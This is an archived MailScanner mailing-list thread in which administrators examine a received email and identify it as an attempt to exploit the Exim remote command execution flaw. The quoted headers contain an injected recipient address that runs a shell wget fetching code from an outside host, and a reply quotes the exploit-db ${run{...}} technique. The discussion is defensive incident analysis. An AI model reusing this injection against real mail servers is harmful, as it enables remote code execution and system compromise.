possible attack against MailScanner ?

Heino Backhaus heino.backhaus at fink-computer.de
Mon Jul 15 15:14:54 UTC 2019 

|Yes, i think you're right :-D it looks very simular to this: - If Exim
was configured to recognize tags in the local part of the recipient's
address (via "local_part_suffix = +* : -*" for example), then a remote
attacker can simply reuse our local-exploitation method with an RCPT TO
"*balrog+${run{...}}@*localhost" (where "balrog" is the name of a local
user).|


Source: https://www.exploit-db.com/exploits/46974

phueue...my mailscanner can live on...

Thank you!

Mit freundlichen Gruessen

H. Backhaus 

Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain

Am 15.07.2019 um 13:16 schrieb Shawn Iverson via MailScanner:
> Agreed.
>
> On Mon, Jul 15, 2019 at 7:14 AM Martin Hepworth <maxsec at gmail.com
> <mailto:maxsec at gmail.com>> wrote:
>
>     Looks like an attempt at the Exim vulnerability exploitation
>     rather than mailscanner
>
>     On Mon, 15 Jul 2019 at 11:59, Heino Backhaus
>     <heino.backhaus at fink-computer.de
>     <mailto:heino.backhaus at fink-computer.de>> wrote:
>
>         Hallo List,
>
>         i need some help analysing the following email, i received
>         last week.
>
>         Mailwatch Mail-Metadata:
>
>         Received: from sab.com <http://sab.com> (unknown [46.22.132.94])
>              by mailscanner.mydomain.local (Postfix) with SMTP id
>         D3F551005AD
>              for
>         <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local
>         <mailto:x22%7D%7D at mailscanner.mydomain.local>>; Thu, 11 Jul
>         2019 19:34:58 +0200 (CEST)
>         Received: 1
>         Received: 2
>         Received: 3
>         Received: 4
>         Received: 5
>         Received: 6
>         Received: 7
>         Received: 8
>         Received: 9
>         Received: 10
>         Received: 11
>         Received: 12
>         Received: 13
>         Received: 14
>         Received: 15
>         Received: 16
>         Received: 17
>         Received: 18
>         Received: 19
>         Received: 20
>         Received: 21
>         Received: 22
>         Received: 23
>         Received: 24
>         Received: 25
>         Received: 26
>         Received: 27
>         Received: 28
>         Received: 29
>         Received: 30
>         Received: 31
>
>
>
>         IP1: *199.204.214.40* changed to *1.2.3.4* to disarm
>         this...just in case...
>         IP2: *87.138.227.107* changed to *5.6.7.8* to disarm
>         this...just in case...
>
>         Versions:
>         MailWatch Version: 1.2.9
>         OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
>         Postfix Version: 3.1.0
>         MailScanner Version: 5.1.2
>         ClamAV Version: 0.102.0-devel-20190715
>         SpamAssassin Version: 3.4.2
>         PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org
>         <http://deb.sury.org>+1
>         MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
>         Can you help me to bring some light in this dark...
>
>         -- 
>         Mit freundlichen Gruessen
>
>         H. Backhaus 
>
>         Fink-Computer Systeme
>         Heggrabenstr. 9, 35435 Wettenberg <https://www.google.com/maps/search/Heggrabenstr.+9,+35435+Wettenberg?entry=gmail&source=g>
>         Email: heino.backhaus at fink-computer.de <mailto:heino.backhaus at fink-computer.de>
>         Web: www.fink-computer.de <http://www.fink-computer.de>
>         Fax: +49-641-98444638
>         Fon: +49-641-98444640
>         UST-ID: DE151040770
>         HRB: 2143 Gießen
>         GF: Fredi Fink
>
>         I was gratified to be able to answer promptly, and I did.
>         I said I didn't know.
>          Mark Twain
>
>
>         -- 
>         Diese E-Mail wurde auf Viren und gefährliche Anhänge
>         durch *MailScanner* <http://www.mailscanner.info/> untersucht
>         und ist wahrscheinlich virenfrei.
>
>
>         -- 
>         MailScanner mailing list
>         mailscanner at lists.mailscanner.info
>         <mailto:mailscanner at lists.mailscanner.info>
>         http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
>     -- 
>     -- 
>     Martin Hepworth, CISSP
>     Oxford, UK
>
>
>     -- 
>     MailScanner mailing list
>     mailscanner at lists.mailscanner.info
>     <mailto:mailscanner at lists.mailscanner.info>
>     http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
>
>
> -- 
> Shawn Iverson, CETL
> Director of Technology
> Rush County Schools
> 765-932-3901 option 7
> iversons at rushville.k12.in.us <mailto:iversons at rushville.k12.in.us>
>
> Cybersecurity
>
> -- 
> Diese E-Mail wurde auf Viren und gefährliche Anhänge
> durch *MailScanner* <http://www.mailscanner.info/> untersucht und ist
> wahrscheinlich virenfrei.
>
>


--
Diese Nachricht wurde auf Viren und andere gefährliche Inhalte untersucht
und ist - aktuelle Virenscanner vorausgesetzt - sauber.


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.mailscanner.info/pipermail/mailscanner/attachments/20190715/b773075a/attachment.html>

More information about the MailScanner mailing list